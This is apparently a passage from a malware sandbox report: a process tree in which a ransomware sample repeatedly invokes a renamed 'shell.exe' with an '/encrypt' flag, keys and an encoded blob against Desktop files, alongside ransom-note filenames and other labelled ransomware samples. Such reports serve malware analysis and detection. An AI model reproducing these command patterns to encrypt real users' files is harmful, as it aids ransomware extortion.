                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\ShowSync.rle.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:4548
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\StartRemove.mpeg3.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1176
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\sWiVkIcd-unycY7aQ.[[email protected]].gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:5756
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\TestUndo.ppt.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:7028
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\TUKJxPJj-ELwXopms.[[email protected]].gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:6684
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\UnblockRestore.jtx.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:5924
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\uWPwQFnd-mjxwmm85.[[email protected]].gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:5380
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\WriteResolve.dib.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:4520
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\WZos2rLV-wyxty8Lk.[[email protected]].gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:5744
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\[HOW_TO_DECRYPT_FILES].html"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1872
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\2aua0mwa.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1492
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\HEUR-Trojan-Ransom.MSIL.Blocker.gen-57c4578f5aeecf623987474b555093aef07bed73797aca041afd31e0e67351ef.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:6620
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\HEUR-Trojan-Ransom.MSIL.Crypmod.gen-d5086f660b09c07006a213469edbb78549596e9231953993cc7ab43f14a1caec.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:4492
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\HEUR-Trojan-Ransom.MSIL.Encoder.gen-26750ee4c44e015354e290cf0f064a52340e623fc5df8986d9c4c3dce62cd066.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:5504
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\HEUR-Trojan-Ransom.Win32.Agent.gen-c258088499ef0bcd93fa23f726bef802a11fe8aa03b95262f827e0a7c01aa2c5.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2052
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\HEUR-Trojan-Ransom.Win32.Blocker.gen-bd8d1fb9b2ffb5690b84e32e5d6c794d42ec4ec753222478092776ea1e483991.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:4868
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\HEUR-Trojan-Ransom.Win32.Generic-8a57e361887aca6d776de1c2cc8f1f30cfddd2cf882726fab12084f06bda0c1a.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2864
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\KEYIDS.KLST.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:2588
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Restore-My-Files.txt"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:4420
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\shell.exe
